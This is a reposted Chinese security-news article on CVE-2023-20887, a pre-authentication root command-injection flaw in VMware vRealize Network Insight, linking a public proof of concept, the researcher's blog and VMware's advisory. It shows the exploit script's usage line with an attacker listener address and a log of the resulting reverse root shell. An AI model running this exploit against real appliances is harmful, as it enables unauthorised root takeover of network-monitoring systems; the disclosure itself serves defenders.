关于VMWare vRealize Network Insight 预验证 RCE (CVE-2023-20887)

admin 2023年6月14日13:18:02评论128 views字数 1054阅读3分30秒阅读模式
关于VMWare vRealize Network Insight 预验证 RCE (CVE-2023-20887)

CVE-2023-20887

CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) 未经身份验证的 RCE 的 POC


技术分析

该漏洞的根本原因分析可以在我的博客上找到:https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

关于VMWare vRealize Network Insight 预验证 RCE (CVE-2023-20887)

概括

VMWare Aria Operations for Networks (vRealize Network Insight) 在通过 Apache Thrift RPC 接口接受用户输入时容易受到命令注入的攻击。此漏洞允许远程未经身份验证的攻击者以 root 用户身份在底层操作系统上执行任意命令。RPC 接口受可以绕过的反向代理保护。VMware 已将此问题的严重性评估为处于严重严重性范围内,最高 CVSSv3 基本分数为 9.8。恶意行为者可以在设备的“root”上下文中远程执行代码。VMWare 6.x 版本易受攻击。


用法

python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)(*) Starting handler(+) Received connection from 192.168.116.100(+) pop thy shell! (it's ready)sudo bashiduid=0(root) gid=0(root) groups=0(root)hostnamevrni-platform-release

缓解措施

更新到最新版本或按照进度咨询中的说明进行缓解

https://www.vmware.com/security/advisories/VMSA-2023-0012.html


项目地址:https://github.com/sinsinology/CVE-2023-20887


感谢您抽出

关于VMWare vRealize Network Insight 预验证 RCE (CVE-2023-20887)

.

关于VMWare vRealize Network Insight 预验证 RCE (CVE-2023-20887)

.

关于VMWare vRealize Network Insight 预验证 RCE (CVE-2023-20887)

来阅读本文

关于VMWare vRealize Network Insight 预验证 RCE (CVE-2023-20887)

点它,分享点赞在看都在这里

原文始发于微信公众号(Ots安全):关于VMWare vRealize Network Insight 预验证 RCE (CVE-2023-20887)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月14日13:18:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   关于VMWare vRealize Network Insight 预验证 RCE (CVE-2023-20887)http://cn-sec.com/archives/1806332.html

发表评论

匿名网友 填写信息